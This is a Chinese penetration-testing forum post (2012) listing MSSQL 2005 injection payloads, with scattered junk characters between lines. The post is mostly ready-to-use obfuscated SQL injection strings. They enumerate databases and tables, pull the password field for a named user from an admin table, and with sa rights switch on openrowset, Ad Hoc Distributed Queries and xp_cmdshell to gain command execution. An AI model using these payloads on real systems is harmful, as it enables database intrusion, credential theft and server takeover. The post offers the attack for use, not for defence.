找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 MSsql2005注入语句
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2166|回复: 0
打印 上一主题 下一主题

MSsql2005注入语句

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 17:19:47 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

% f# O4 s; L2 ]" Y, D3 L1 t$ L, Y9 y6 J, G
4 H7 U: o% u* [- F: v1 z: w2 [/ U
[Copy to clipboard]CODE:4 A9 u& |9 X2 {& d2 O* e% N
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
- d+ F$ P! N6 t0 q- D( p, N* r- i1 Y" [
爆表语句,somedb部份是所要列的数据库,红色数字1累加
5 V) h" F8 a5 w0 t, j  }/ q
7 m' G/ P# ^8 E$ @- c6 |! j) j+ x" s1 F: F; c, S2 a: v  @
[Copy to clipboard]CODE:
2 T- }* l6 F$ @3 a  a' n6 w9 }% _/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--! M% P% S$ q5 Z; U1 Q) w* B! _

( C8 h3 |2 x) V$ Q' ~3 k5 c爆字段语句,爆表admin里user='icerover'的密码段
7 ?, @6 R0 @8 k. l* U* M* U; v% h6 Q( z% \4 \3 U! `) g5 i

" @$ a/ e+ Y* c. c8 C. _[Copy to clipboard]CODE:. C3 g0 J2 f( k
**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--
1 c% e. F! \. t/ O" j3 M5 Y/ M$ X3 H- D( \8 u
mssql2005默认没有开xp_cmdshell的,openrowset也不能用; N' u1 J. `2 y$ L' h& p' e
如果是sa权限,可以这样来开启) O7 v6 p! X0 a
开启openrowset" |7 H& l& G2 X! E) p

1 q% R- _6 F; o5 G$ x2 v+ I0 D% U$ C8 z
[Copy to clipboard]CODE:
1 Q, s3 X% r, `/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
% S0 s8 |9 p# ^8 D/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--! W, [5 \, u1 }/ k& d" L
& [0 ^: x# j% @+ K4 J: |6 E
开启xp_cmdshell8 w! t5 w/ s, O6 O
6 f/ G$ P6 m+ n' Q4 d) S; _
+ |0 U6 u( h% W" Z8 s- w
[Copy to clipboard]CODE:
$ w" i* g5 o: n7 ~. iEXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--7 A# }5 P+ Z3 u# s5 _. w9 |! B
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--5 d1 }- [- \5 ?! ~' E0 a

; d$ f4 U9 S( I+ ~2 \! {% aok,over~~晚安" H2 m' B. W9 b# S1 M
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表